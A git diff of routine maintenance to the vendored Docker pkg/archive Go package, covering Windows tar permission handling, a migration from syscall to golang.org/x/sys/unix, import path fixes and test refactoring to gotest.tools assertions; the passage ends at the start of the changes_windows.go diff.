diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go
index 5c3a1be340..69aadd823c 100644
--- a/vendor/github.com/docker/docker/pkg/archive/archive_windows.go
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
@@ -9,6 +7,7 @@ import (
 	"path/filepath"
 	"strings"
 
+	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/longpath"
 )
 
@@ -42,15 +41,23 @@ func CanonicalTarNameForPath(p string) (string, error) {
 // chmodTarEntry is used to adjust the file permissions used in tar header based
 // on the platform the archival is done.
 func chmodTarEntry(perm os.FileMode) os.FileMode {
-	perm &= 0755
+	//perm &= 0755 // this 0-ed out tar flags (like link, regular file, directory marker etc.)
+	permPart := perm & os.ModePerm
+	noPermPart := perm &^ os.ModePerm
 	// Add the x bit: make everything +x from windows
-	perm |= 0111
+	permPart |= 0111
+	permPart &= 0755
+
+	return noPermPart | permPart
+}
 
-	return perm
+func setHeaderForSpecialDevice(hdr *tar.Header, name string, stat interface{}) (err error) {
+	// do nothing. no notion of Rdev, Nlink in stat on Windows
+	return
 }
 
-func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) {
-	// do nothing. no notion of Rdev, Inode, Nlink in stat on Windows
+func getInodeFromStat(stat interface{}) (inode uint64, err error) {
+	// do nothing. no notion of Inode in stat on Windows
 	return
 }
 
@@ -64,7 +71,7 @@ func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error {
 	return nil
 }
 
-func getFileUIDGID(stat interface{}) (int, int, error) {
+func getFileUIDGID(stat interface{}) (idtools.IDPair, error) {
 	// no notion of file ownership mapping yet on Windows
-	return 0, 0, nil
+	return idtools.IDPair{UID: 0, GID: 0}, nil
 }
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go
index 0c6733d6bd..b3dbb32754 100644
--- a/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go
@@ -1,6 +1,6 @@
 // +build windows
 
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"io/ioutil"
@@ -27,7 +27,7 @@ func TestCopyFileWithInvalidDest(t *testing.T) {
 		t.Fatal(err)
 	}
 	ioutil.WriteFile(src, []byte("content"), 0777)
-	err = CopyWithTar(src, dest)
+	err = defaultCopyWithTar(src, dest)
 	if err == nil {
 		t.Fatalf("archiver.CopyWithTar should throw an error on invalid dest.")
 	}
@@ -82,6 +82,8 @@ func TestChmodTarEntry(t *testing.T) {
 		{0644, 0755},
 		{0755, 0755},
 		{0444, 0555},
+		{0755 | os.ModeDir, 0755 | os.ModeDir},
+		{0755 | os.ModeSymlink, 0755 | os.ModeSymlink},
 	}
 	for _, v := range cases {
 		if out := chmodTarEntry(v.in); out != v.expected {
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes.go b/vendor/github.com/docker/docker/pkg/archive/changes.go
index c07d55cbd9..43734db5b1 100644
--- a/vendor/github.com/docker/docker/pkg/archive/changes.go
+++ b/vendor/github.com/docker/docker/pkg/archive/changes.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
@@ -13,10 +13,10 @@ import (
 	"syscall"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/pools"
 	"github.com/docker/docker/pkg/system"
+	"github.com/sirupsen/logrus"
 )
 
 // ChangeType represents the change type.
@@ -267,7 +267,7 @@ func (info *FileInfo) addChanges(oldInfo *FileInfo, changes *[]Change) {
 	}
 
 	for name, newChild := range info.children {
-		oldChild, _ := oldChildren[name]
+		oldChild := oldChildren[name]
 		if oldChild != nil {
 			// change?
 			oldStat := oldChild.stat
@@ -279,7 +279,7 @@ func (info *FileInfo) addChanges(oldInfo *FileInfo, changes *[]Change) {
 			// breaks down is if some code intentionally hides a change by setting
 			// back mtime
 			if statDifferent(oldStat, newStat) ||
-				bytes.Compare(oldChild.capability, newChild.capability) != 0 {
+				!bytes.Equal(oldChild.capability, newChild.capability) {
 				change := Change{
 					Path: newChild.path(),
 					Kind: ChangeModify,
@@ -394,13 +394,8 @@ func ChangesSize(newDir string, changes []Change) int64 {
 func ExportChanges(dir string, changes []Change, uidMaps, gidMaps []idtools.IDMap) (io.ReadCloser, error) {
 	reader, writer := io.Pipe()
 	go func() {
-		ta := &tarAppender{
-			TarWriter: tar.NewWriter(writer),
-			Buffer:    pools.BufioWriter32KPool.Get(nil),
-			SeenFiles: make(map[uint64]string),
-			UIDMaps:   uidMaps,
-			GIDMaps:   gidMaps,
-		}
+		ta := newTarAppender(idtools.NewIDMappingsFromMaps(uidMaps, gidMaps), writer, nil)
+
 		// this buffer is needed for the duration of this piped stream
 		defer pools.BufioWriter32KPool.Put(ta.Buffer)
 
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_linux.go b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go
index fc5a9dfdb9..78a5393c8e 100644
--- a/vendor/github.com/docker/docker/pkg/archive/changes_linux.go
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"bytes"
@@ -10,6 +10,7 @@ import (
 	"unsafe"
 
 	"github.com/docker/docker/pkg/system"
+	"golang.org/x/sys/unix"
 )
 
 // walker is used to implement collectFileInfoForChanges on linux. Where this
@@ -65,7 +66,7 @@ func walkchunk(path string, fi os.FileInfo, dir string, root *FileInfo) error {
 	}
 	parent := root.LookUp(filepath.Dir(path))
 	if parent == nil {
-		return fmt.Errorf("collectFileInfoForChanges: Unexpectedly no parent for %s", path)
+		return fmt.Errorf("walkchunk: Unexpectedly no parent for %s", path)
 	}
 	info := &FileInfo{
 		name:     filepath.Base(path),
@@ -233,7 +234,7 @@ func readdirnames(dirname string) (names []nameIno, err error) {
 		// Refill the buffer if necessary
 		if bufp >= nbuf {
 			bufp = 0
-			nbuf, err = syscall.ReadDirent(int(f.Fd()), buf) // getdents on linux
+			nbuf, err = unix.ReadDirent(int(f.Fd()), buf) // getdents on linux
 			if nbuf < 0 {
 				nbuf = 0
 			}
@@ -255,12 +256,12 @@ func readdirnames(dirname string) (names []nameIno, err error) {
 	return sl, nil
 }
 
-// parseDirent is a minor modification of syscall.ParseDirent (linux version)
+// parseDirent is a minor modification of unix.ParseDirent (linux version)
 // which returns {name,inode} pairs instead of just names.
 func parseDirent(buf []byte, names []nameIno) (consumed int, newnames []nameIno) {
 	origlen := len(buf)
 	for len(buf) > 0 {
-		dirent := (*syscall.Dirent)(unsafe.Pointer(&buf[0]))
+		dirent := (*unix.Dirent)(unsafe.Pointer(&buf[0]))
 		buf = buf[dirent.Reclen:]
 		if dirent.Ino == 0 { // File absent in directory.
 			continue
@@ -293,7 +294,7 @@ func OverlayChanges(layers []string, rw string) ([]Change, error) {
 func overlayDeletedFile(root, path string, fi os.FileInfo) (string, error) {
 	if fi.Mode()&os.ModeCharDevice != 0 {
 		s := fi.Sys().(*syscall.Stat_t)
-		if major(uint64(s.Rdev)) == 0 && minor(uint64(s.Rdev)) == 0 {
+		if unix.Major(uint64(s.Rdev)) == 0 && unix.Minor(uint64(s.Rdev)) == 0 { // nolint: unconvert
 			return path, nil
 		}
 	}
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_other.go b/vendor/github.com/docker/docker/pkg/archive/changes_other.go
index da70ed37c4..ba744741cd 100644
--- a/vendor/github.com/docker/docker/pkg/archive/changes_other.go
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_other.go
@@ -1,6 +1,6 @@
 // +build !linux
 
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go
index 095102e578..019a0250f3 100644
--- a/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
@@ -7,16 +7,11 @@ import (
 	"io/ioutil"
 	"os"
 	"path"
-	"runtime"
 	"sort"
 	"testing"
 )
 
 func TestHardLinkOrder(t *testing.T) {
-	//TODO Should run for Solaris
-	if runtime.GOOS == "solaris" {
-		t.Skip("gcp failures on Solaris")
-	}
 	names := []string{"file1.txt", "file2.txt", "file3.txt"}
 	msg := []byte("Hey y'all")
 
@@ -117,7 +112,7 @@ func (th tarHeaders) Less(i, j int) bool { return th[i].Name < th[j].Name }
 
 func walkHeaders(r io.Reader) ([]tar.Header, error) {
 	t := tar.NewReader(r)
-	headers := []tar.Header{}
+	var headers []tar.Header
 	for {
 		hdr, err := t.Next()
 		if err != nil {
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_test.go b/vendor/github.com/docker/docker/pkg/archive/changes_test.go
index eae1d022c7..f2527cd936 100644
--- a/vendor/github.com/docker/docker/pkg/archive/changes_test.go
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_test.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"io/ioutil"
@@ -11,6 +11,8 @@ import (
 	"time"
 
 	"github.com/docker/docker/pkg/system"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
 )
 
 func max(x, y int) int {
@@ -21,15 +23,7 @@ func max(x, y int) int {
 }
 
 func copyDir(src, dst string) error {
-	cmd := exec.Command("cp", "-a", src, dst)
-	if runtime.GOOS == "solaris" {
-		cmd = exec.Command("gcp", "-a", src, dst)
-	}
-
-	if err := cmd.Run(); err != nil {
-		return err
-	}
-	return nil
+	return exec.Command("cp", "-a", src, dst).Run()
 }
 
 type FileType uint32
@@ -49,63 +43,62 @@ type FileData struct {
 
 func createSampleDir(t *testing.T, root string) {
 	files := []FileData{
-		{Regular, "file1", "file1\n", 0600},
-		{Regular, "file2", "file2\n", 0666},
-		{Regular, "file3", "file3\n", 0404},
-		{Regular, "file4", "file4\n", 0600},
-		{Regular, "file5", "file5\n", 0600},
-		{Regular, "file6", "file6\n", 0600},
-		{Regular, "file7", "file7\n", 0600},
-		{Dir, "dir1", "", 0740},
-		{Regular, "dir1/file1-1", "file1-1\n", 01444},
-		{Regular, "dir1/file1-2", "file1-2\n", 0666},
-		{Dir, "dir2", "", 0700},
-		{Regular, "dir2/file2-1", "file2-1\n", 0666},
-		{Regular, "dir2/file2-2", "file2-2\n", 0666},
-		{Dir, "dir3", "", 0700},
-		{Regular, "dir3/file3-1", "file3-1\n", 0666},
-		{Regular, "dir3/file3-2", "file3-2\n", 0666},
-		{Dir, "dir4", "", 0700},
-		{Regular, "dir4/file3-1", "file4-1\n", 0666},
-		{Regular, "dir4/file3-2", "file4-2\n", 0666},
-		{Symlink, "symlink1", "target1", 0666},
-		{Symlink, "symlink2", "target2", 0666},
-		{Symlink, "symlink3", root + "/file1", 0666},
-		{Symlink, "symlink4", root + "/symlink3", 0666},
-		{Symlink, "dirSymlink", root + "/dir1", 0740},
-	}
+		{filetype: Regular, path: "file1", contents: "file1\n", permissions: 0600},
+		{filetype: Regular, path: "file2", contents: "file2\n", permissions: 0666},
+		{filetype: Regular, path: "file3", contents: "file3\n", permissions: 0404},
+		{filetype: Regular, path: "file4", contents: "file4\n", permissions: 0600},
+		{filetype: Regular, path: "file5", contents: "file5\n", permissions: 0600},
+		{filetype: Regular, path: "file6", contents: "file6\n", permissions: 0600},
+		{filetype: Regular, path: "file7", contents: "file7\n", permissions: 0600},
+		{filetype: Dir, path: "dir1", contents: "", permissions: 0740},
+		{filetype: Regular, path: "dir1/file1-1", contents: "file1-1\n", permissions: 01444},
+		{filetype: Regular, path: "dir1/file1-2", contents: "file1-2\n", permissions: 0666},
+		{filetype: Dir, path: "dir2", contents: "", permissions: 0700},
+		{filetype: Regular, path: "dir2/file2-1", contents: "file2-1\n", permissions: 0666},
+		{filetype: Regular, path: "dir2/file2-2", contents: "file2-2\n", permissions: 0666},
+		{filetype: Dir, path: "dir3", contents: "", permissions: 0700},
+		{filetype: Regular, path: "dir3/file3-1", contents: "file3-1\n", permissions: 0666},
+		{filetype: Regular, path: "dir3/file3-2", contents: "file3-2\n", permissions: 0666},
+		{filetype: Dir, path: "dir4", contents: "", permissions: 0700},
+		{filetype: Regular, path: "dir4/file3-1", contents: "file4-1\n", permissions: 0666},
+		{filetype: Regular, path: "dir4/file3-2", contents: "file4-2\n", permissions: 0666},
+		{filetype: Symlink, path: "symlink1", contents: "target1", permissions: 0666},
+		{filetype: Symlink, path: "symlink2", contents: "target2", permissions: 0666},
+		{filetype: Symlink, path: "symlink3", contents: root + "/file1", permissions: 0666},
+		{filetype: Symlink, path: "symlink4", contents: root + "/symlink3", permissions: 0666},
+		{filetype: Symlink, path: "dirSymlink", contents: root + "/dir1", permissions: 0740},
+	}
+	provisionSampleDir(t, root, files)
+}
 
+func provisionSampleDir(t *testing.T, root string, files []FileData) {
 	now := time.Now()
 	for _, info := range files {
 		p := path.Join(root, info.path)
 		if info.filetype == Dir {
-			if err := os.MkdirAll(p, info.permissions); err != nil {
-				t.Fatal(err)
-			}
+			err := os.MkdirAll(p, info.permissions)
+			assert.NilError(t, err)
 		} else if info.filetype == Regular {
-			if err := ioutil.WriteFile(p, []byte(info.contents), info.permissions); err != nil {
-				t.Fatal(err)
-			}
+			err := ioutil.WriteFile(p, []byte(info.contents), info.permissions)
+			assert.NilError(t, err)
 		} else if info.filetype == Symlink {
-			if err := os.Symlink(info.contents, p); err != nil {
-				t.Fatal(err)
-			}
+			err := os.Symlink(info.contents, p)
+			assert.NilError(t, err)
 		}
 
 		if info.filetype != Symlink {
 			// Set a consistent ctime, atime for all files and dirs
-			if err := system.Chtimes(p, now, now); err != nil {
-				t.Fatal(err)
-			}
+			err := system.Chtimes(p, now, now)
+			assert.NilError(t, err)
 		}
 	}
 }
 
 func TestChangeString(t *testing.T) {
-	modifiyChange := Change{"change", ChangeModify}
-	toString := modifiyChange.String()
+	modifyChange := Change{"change", ChangeModify}
+	toString := modifyChange.String()
 	if toString != "C change" {
-		t.Fatalf("String() of a change with ChangeModifiy Kind should have been %s but was %s", "C change", toString)
+		t.Fatalf("String() of a change with ChangeModify Kind should have been %s but was %s", "C change", toString)
 	}
 	addChange := Change{"change", ChangeAdd}
 	toString = addChange.String()
@@ -126,20 +119,14 @@ func TestChangesWithNoChanges(t *testing.T) {
 		t.Skip("symlinks on Windows")
 	}
 	rwLayer, err := ioutil.TempDir("", "docker-changes-test")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(rwLayer)
 	layer, err := ioutil.TempDir("", "docker-changes-test-layer")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(layer)
 	createSampleDir(t, layer)
 	changes, err := Changes([]string{layer}, rwLayer)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	if len(changes) != 0 {
 		t.Fatalf("Changes with no difference should have detect no changes, but detected %d", len(changes))
 	}
@@ -153,18 +140,14 @@ func TestChangesWithChanges(t *testing.T) {
 	}
 	// Mock the readonly layer
 	layer, err := ioutil.TempDir("", "docker-changes-test-layer")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(layer)
 	createSampleDir(t, layer)
 	os.MkdirAll(path.Join(layer, "dir1/subfolder"), 0740)
 
 	// Mock the RW layer
 	rwLayer, err := ioutil.TempDir("", "docker-changes-test")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(rwLayer)
 
 	// Create a folder in RW layer
@@ -181,9 +164,7 @@ func TestChangesWithChanges(t *testing.T) {
 	ioutil.WriteFile(newFile, []byte{}, 0740)
 
 	changes, err := Changes([]string{layer}, rwLayer)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	expectedChanges := []Change{
 		{"/dir1", ChangeModify},
@@ -203,6 +184,7 @@ func TestChangesWithChangesGH13590(t *testing.T) {
 		t.Skip("symlinks on Windows")
 	}
 	baseLayer, err := ioutil.TempDir("", "docker-changes-test.")
+	assert.NilError(t, err)
 	defer os.RemoveAll(baseLayer)
 
 	dir3 := path.Join(baseLayer, "dir1/dir2/dir3")
@@ -212,6 +194,7 @@ func TestChangesWithChangesGH13590(t *testing.T) {
 	ioutil.WriteFile(file, []byte("hello"), 0666)
 
 	layer, err := ioutil.TempDir("", "docker-changes-test2.")
+	assert.NilError(t, err)
 	defer os.RemoveAll(layer)
 
 	// Test creating a new file
@@ -224,9 +207,7 @@ func TestChangesWithChangesGH13590(t *testing.T) {
 	ioutil.WriteFile(file, []byte("bye"), 0666)
 
 	changes, err := Changes([]string{baseLayer}, layer)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	expectedChanges := []Change{
 		{"/dir1/dir2/dir3", ChangeModify},
@@ -236,6 +217,7 @@ func TestChangesWithChangesGH13590(t *testing.T) {
 
 	// Now test changing a file
 	layer, err = ioutil.TempDir("", "docker-changes-test3.")
+	assert.NilError(t, err)
 	defer os.RemoveAll(layer)
 
 	if err := copyDir(baseLayer+"/dir1", layer+"/"); err != nil {
@@ -246,9 +228,7 @@ func TestChangesWithChangesGH13590(t *testing.T) {
 	ioutil.WriteFile(file, []byte("bye"), 0666)
 
 	changes, err = Changes([]string{baseLayer}, layer)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	expectedChanges = []Change{
 		{"/dir1/dir2/dir3/file.txt", ChangeModify},
@@ -260,25 +240,19 @@ func TestChangesWithChangesGH13590(t *testing.T) {
 func TestChangesDirsEmpty(t *testing.T) {
 	// TODO Windows. There may be a way of running this, but turning off for now
 	// as createSampleDir uses symlinks.
-	// TODO Should work for Solaris
-	if runtime.GOOS == "windows" || runtime.GOOS == "solaris" {
-		t.Skip("symlinks on Windows; gcp failure on Solaris")
+	if runtime.GOOS == "windows" {
+		t.Skip("symlinks on Windows")
 	}
 	src, err := ioutil.TempDir("", "docker-changes-test")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(src)
 	createSampleDir(t, src)
 	dst := src + "-copy"
-	if err := copyDir(src, dst); err != nil {
-		t.Fatal(err)
-	}
+	err = copyDir(src, dst)
+	assert.NilError(t, err)
 	defer os.RemoveAll(dst)
 	changes, err := ChangesDirs(dst, src)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	if len(changes) != 0 {
 		t.Fatalf("Reported changes for identical dirs: %v", changes)
@@ -289,108 +263,86 @@ func TestChangesDirsEmpty(t *testing.T) {
 
 func mutateSampleDir(t *testing.T, root string) {
 	// Remove a regular file
-	if err := os.RemoveAll(path.Join(root, "file1")); err != nil {
-		t.Fatal(err)
-	}
+	err := os.RemoveAll(path.Join(root, "file1"))
+	assert.NilError(t, err)
 
 	// Remove a directory
-	if err := os.RemoveAll(path.Join(root, "dir1")); err != nil {
-		t.Fatal(err)
-	}
+	err = os.RemoveAll(path.Join(root, "dir1"))
+	assert.NilError(t, err)
 
 	// Remove a symlink
-	if err := os.RemoveAll(path.Join(root, "symlink1")); err != nil {
-		t.Fatal(err)
-	}
+	err = os.RemoveAll(path.Join(root, "symlink1"))
+	assert.NilError(t, err)
 
 	// Rewrite a file
-	if err := ioutil.WriteFile(path.Join(root, "file2"), []byte("fileNN\n"), 0777); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(path.Join(root, "file2"), []byte("fileNN\n"), 0777)
+	assert.NilError(t, err)
 
 	// Replace a file
-	if err := os.RemoveAll(path.Join(root, "file3")); err != nil {
-		t.Fatal(err)
-	}
-	if err := ioutil.WriteFile(path.Join(root, "file3"), []byte("fileMM\n"), 0404); err != nil {
-		t.Fatal(err)
-	}
+	err = os.RemoveAll(path.Join(root, "file3"))
+	assert.NilError(t, err)
+	err = ioutil.WriteFile(path.Join(root, "file3"), []byte("fileMM\n"), 0404)
+	assert.NilError(t, err)
 
 	// Touch file
-	if err := system.Chtimes(path.Join(root, "file4"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil {
-		t.Fatal(err)
-	}
+	err = system.Chtimes(path.Join(root, "file4"), time.Now().Add(time.Second), time.Now().Add(time.Second))
+	assert.NilError(t, err)
 
 	// Replace file with dir
-	if err := os.RemoveAll(path.Join(root, "file5")); err != nil {
-		t.Fatal(err)
-	}
-	if err := os.MkdirAll(path.Join(root, "file5"), 0666); err != nil {
-		t.Fatal(err)
-	}
+	err = os.RemoveAll(path.Join(root, "file5"))
+	assert.NilError(t, err)
+	err = os.MkdirAll(path.Join(root, "file5"), 0666)
+	assert.NilError(t, err)
 
 	// Create new file
-	if err := ioutil.WriteFile(path.Join(root, "filenew"), []byte("filenew\n"), 0777); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(path.Join(root, "filenew"), []byte("filenew\n"), 0777)
+	assert.NilError(t, err)
 
 	// Create new dir
-	if err := os.MkdirAll(path.Join(root, "dirnew"), 0766); err != nil {
-		t.Fatal(err)
-	}
+	err = os.MkdirAll(path.Join(root, "dirnew"), 0766)
+	assert.NilError(t, err)
 
 	// Create a new symlink
-	if err := os.Symlink("targetnew", path.Join(root, "symlinknew")); err != nil {
-		t.Fatal(err)
-	}
+	err = os.Symlink("targetnew", path.Join(root, "symlinknew"))
+	assert.NilError(t, err)
 
 	// Change a symlink
-	if err := os.RemoveAll(path.Join(root, "symlink2")); err != nil {
-		t.Fatal(err)
-	}
-	if err := os.Symlink("target2change", path.Join(root, "symlink2")); err != nil {
-		t.Fatal(err)
-	}
+	err = os.RemoveAll(path.Join(root, "symlink2"))
+	assert.NilError(t, err)
+
+	err = os.Symlink("target2change", path.Join(root, "symlink2"))
+	assert.NilError(t, err)
 
 	// Replace dir with file
-	if err := os.RemoveAll(path.Join(root, "dir2")); err != nil {
-		t.Fatal(err)
-	}
-	if err := ioutil.WriteFile(path.Join(root, "dir2"), []byte("dir2\n"), 0777); err != nil {
-		t.Fatal(err)
-	}
+	err = os.RemoveAll(path.Join(root, "dir2"))
+	assert.NilError(t, err)
+	err = ioutil.WriteFile(path.Join(root, "dir2"), []byte("dir2\n"), 0777)
+	assert.NilError(t, err)
 
 	// Touch dir
-	if err := system.Chtimes(path.Join(root, "dir3"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil {
-		t.Fatal(err)
-	}
+	err = system.Chtimes(path.Join(root, "dir3"), time.Now().Add(time.Second), time.Now().Add(time.Second))
+	assert.NilError(t, err)
 }
 
 func TestChangesDirsMutated(t *testing.T) {
 	// TODO Windows. There may be a way of running this, but turning off for now
 	// as createSampleDir uses symlinks.
-	// TODO Should work for Solaris
-	if runtime.GOOS == "windows" || runtime.GOOS == "solaris" {
-		t.Skip("symlinks on Windows; gcp failures on Solaris")
+	if runtime.GOOS == "windows" {
+		t.Skip("symlinks on Windows")
 	}
 	src, err := ioutil.TempDir("", "docker-changes-test")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	createSampleDir(t, src)
 	dst := src + "-copy"
-	if err := copyDir(src, dst); err != nil {
-		t.Fatal(err)
-	}
+	err = copyDir(src, dst)
+	assert.NilError(t, err)
 	defer os.RemoveAll(src)
 	defer os.RemoveAll(dst)
 
 	mutateSampleDir(t, dst)
 
 	changes, err := ChangesDirs(dst, src)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	sort.Sort(changesByPath(changes))
 
@@ -431,46 +383,33 @@ func TestChangesDirsMutated(t *testing.T) {
 func TestApplyLayer(t *testing.T) {
 	// TODO Windows. There may be a way of running this, but turning off for now
 	// as createSampleDir uses symlinks.
-	// TODO Should work for Solaris
-	if runtime.GOOS == "windows" || runtime.GOOS == "solaris" {
-		t.Skip("symlinks on Windows; gcp failures on Solaris")
+	if runtime.GOOS == "windows" {
+		t.Skip("symlinks on Windows")
 	}
 	src, err := ioutil.TempDir("", "docker-changes-test")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	createSampleDir(t, src)
 	defer os.RemoveAll(src)
 	dst := src + "-copy"
-	if err := copyDir(src, dst); err != nil {
-		t.Fatal(err)
-	}
+	err = copyDir(src, dst)
+	assert.NilError(t, err)
 	mutateSampleDir(t, dst)
 	defer os.RemoveAll(dst)
 
 	changes, err := ChangesDirs(dst, src)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	layer, err := ExportChanges(dst, changes, nil, nil)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	layerCopy, err := NewTempArchive(layer, "")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	if _, err := ApplyLayer(src, layerCopy); err != nil {
-		t.Fatal(err)
-	}
+	_, err = ApplyLayer(src, layerCopy)
+	assert.NilError(t, err)
 
 	changes2, err := ChangesDirs(src, dst)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	if len(changes2) != 0 {
 		t.Fatalf("Unexpected differences after reapplying mutation: %v", changes2)
@@ -484,26 +423,18 @@ func TestChangesSizeWithHardlinks(t *testing.T) {
 		t.Skip("hardlinks on Windows")
 	}
 	srcDir, err := ioutil.TempDir("", "docker-test-srcDir")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(srcDir)
 
 	destDir, err := ioutil.TempDir("", "docker-test-destDir")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(destDir)
 
 	creationSize, err := prepareUntarSourceDirectory(100, destDir, true)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	changes, err := ChangesDirs(destDir, srcDir)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	got := ChangesSize(destDir, changes)
 	if got != int64(creationSize) {
@@ -530,15 +461,15 @@ func TestChangesSizeWithOnlyDeleteChanges(t *testing.T) {
 
 func TestChangesSize(t *testing.T) {
 	parentPath, err := ioutil.TempDir("", "docker-changes-test")
+	assert.NilError(t, err)
 	defer os.RemoveAll(parentPath)
 	addition := path.Join(parentPath, "addition")
-	if err := ioutil.WriteFile(addition, []byte{0x01, 0x01, 0x01}, 0744); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(addition, []byte{0x01, 0x01, 0x01}, 0744)
+	assert.NilError(t, err)
 	modification := path.Join(parentPath, "modification")
-	if err = ioutil.WriteFile(modification, []byte{0x01, 0x01, 0x01}, 0744); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(modification, []byte{0x01, 0x01, 0x01}, 0744)
+	assert.NilError(t, err)
+
 	changes := []Change{
 		{Path: "addition", Kind: ChangeAdd},
 		{Path: "modification", Kind: ChangeModify},
@@ -550,6 +481,7 @@ func TestChangesSize(t *testing.T) {
 }
 
 func checkChanges(expectedChanges, changes []Change, t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	sort.Sort(changesByPath(expectedChanges))
 	sort.Sort(changesByPath(changes))
 	for i := 0; i < max(len(changes), len(expectedChanges)); i++ {
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_unix.go b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go
index 3778b732cf..c06a209d8e 100644
--- a/vendor/github.com/docker/docker/pkg/archive/changes_unix.go
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go
@@ -1,12 +1,13 @@
 // +build !windows
 
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"os"
 	"syscall"
 
 	"github.com/docker/docker/pkg/system"
+	"golang.org/x/sys/unix"
 )
 
 func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool {
@@ -16,7 +17,7 @@ func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool {
 		oldStat.GID() != newStat.GID() ||
 		oldStat.Rdev() != newStat.Rdev() ||
 		// Don't look at size for dirs, its not a good measure of change
-		(oldStat.Mode()&syscall.S_IFDIR != syscall.S_IFDIR &&
+		(oldStat.Mode()&unix.S_IFDIR != unix.S_IFDIR &&
 			(!sameFsTimeSpec(oldStat.Mtim(), newStat.Mtim()) || (oldStat.Size() != newStat.Size()))) {
 		return true
 	}
@@ -24,11 +25,11 @@ func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool {
 }
 
 func (info *FileInfo) isDir() bool {
-	return info.parent == nil || info.stat.Mode()&syscall.S_IFDIR != 0
+	return info.parent == nil || info.stat.Mode()&unix.S_IFDIR != 0
 }
 
 func getIno(fi os.FileInfo) uint64 {
-	return uint64(fi.Sys().(*syscall.Stat_t).Ino)
+	return fi.Sys().(*syscall.Stat_t).Ino
 }
 
 func hasHardlinks(fi os.FileInfo) bool {
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_windows.go b/vendor/github.com/docker/docker/pkg/archive/changes_windows.go
index af94243fc4..6555c01368 100644
